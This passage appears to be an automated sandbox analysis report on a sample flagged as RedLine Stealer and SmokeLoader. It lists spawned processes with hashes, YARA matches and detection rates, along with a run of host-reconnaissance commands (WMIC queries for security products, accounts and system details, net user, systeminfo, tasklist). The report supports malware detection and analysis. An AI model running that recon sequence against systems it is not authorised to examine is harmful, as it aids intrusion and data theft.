                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 29%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:20:52:53
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\C35.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\C35.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:245'248 bytes
                                                                                                                            MD5 hash:31B228301D6FB368186C2D025311D1AF
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:20:53:17
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\vejhhuh
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\vejhhuh
                                                                                                                            Imagebase:0xd30000
                                                                                                                            File size:245'248 bytes
                                                                                                                            MD5 hash:31B228301D6FB368186C2D025311D1AF
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Avira
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:9
                                                                                                                            Start time:20:53:29
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\451E.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\451E.exe
                                                                                                                            Imagebase:0x7ff763af0000
                                                                                                                            File size:78'336 bytes
                                                                                                                            MD5 hash:69C7186C5393D5E94294E39DA1D4D830
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 37%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Target ID:10
                                                                                                                            Start time:20:53:30
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                            Imagebase:0x7ff7e14a0000
                                                                                                                            File size:69'632 bytes
                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:11
                                                                                                                            Start time:20:53:33
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                            Imagebase:0xd50000
                                                                                                                            File size:4'514'184 bytes
                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:20:53:33
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:cmd
                                                                                                                            Imagebase:0x7ff641da0000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:20:53:33
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:20:53:34
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                            File size:5'141'208 bytes
                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:15
                                                                                                                            Start time:20:53:34
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:20:53:35
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                            Imagebase:0xd50000
                                                                                                                            File size:4'514'184 bytes
                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:17
                                                                                                                            Start time:20:53:36
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                            File size:5'141'208 bytes
                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:18
                                                                                                                            Start time:20:53:36
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:19
                                                                                                                            Start time:20:53:37
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                            Imagebase:0xd50000
                                                                                                                            File size:4'514'184 bytes
                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:20
                                                                                                                            Start time:20:53:39
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:21
                                                                                                                            Start time:20:53:39
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                            File size:5'141'208 bytes
                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:22
                                                                                                                            Start time:20:53:40
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:23
                                                                                                                            Start time:20:53:42
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:24
                                                                                                                            Start time:20:53:44
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:25
                                                                                                                            Start time:20:53:46
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:26
                                                                                                                            Start time:20:53:49
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:27
                                                                                                                            Start time:20:53:51
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:28
                                                                                                                            Start time:20:53:56
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:29
                                                                                                                            Start time:20:53:58
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:30
                                                                                                                            Start time:20:54:00
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:31
                                                                                                                            Start time:20:54:04
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:32
                                                                                                                            Start time:20:54:07
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                                            Imagebase:0x7ff749240000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:33
                                                                                                                            Start time:20:54:09
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\ipconfig.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:ipconfig /displaydns
                                                                                                                            Imagebase:0x7ff6e2a50000
                                                                                                                            File size:35'840 bytes
                                                                                                                            MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:34
                                                                                                                            Start time:20:54:10
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:route print
                                                                                                                            Imagebase:0x7ff634940000
                                                                                                                            File size:24'576 bytes
                                                                                                                            MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:35
                                                                                                                            Start time:20:54:11
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:netsh firewall show state
                                                                                                                            Imagebase:0x7ff781b50000
                                                                                                                            File size:96'768 bytes
                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:36
                                                                                                                            Start time:20:54:12
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:systeminfo
                                                                                                                            Imagebase:0x7ff6fee80000
                                                                                                                            File size:110'080 bytes
                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:38
                                                                                                                            Start time:20:54:15
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:tasklist /v /fo csv
                                                                                                                            Imagebase:0x7ff628af0000
                                                                                                                            File size:106'496 bytes
                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:39
                                                                                                                            Start time:20:54:40
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:net accounts /domain
                                                                                                                            Imagebase:0x7ff6de720000
                                                                                                                            File size:59'904 bytes
                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:40
                                                                                                                            Start time:20:54:40
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\net1 accounts /domain
                                                                                                                            Imagebase:0x7ff6553c0000
                                                                                                                            File size:183'808 bytes
                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:41
                                                                                                                            Start time:20:54:41
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:net share
                                                                                                                            Imagebase:0x7ff6de720000
                                                                                                                            File size:59'904 bytes
                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:42
                                                                                                                            Start time:20:54:42
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\net1 share
                                                                                                                            Imagebase:0x7ff6553c0000
                                                                                                                            File size:183'808 bytes
                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:43
                                                                                                                            Start time:20:54:44
                                                                                                                            Start date:02/10/2024
                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:net user
                                                                                                                            Imagebase:0x7ff6de720000
                                                                                                                            File size:59'904 bytes
                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:9%
                                                                                                                              Dynamic/Decrypted Code Coverage:18.4%
                                                                                                                              Signature Coverage:28.7%
                                                                                                                              Total number of Nodes:261
                                                                                                                              Total number of Limit Nodes:8
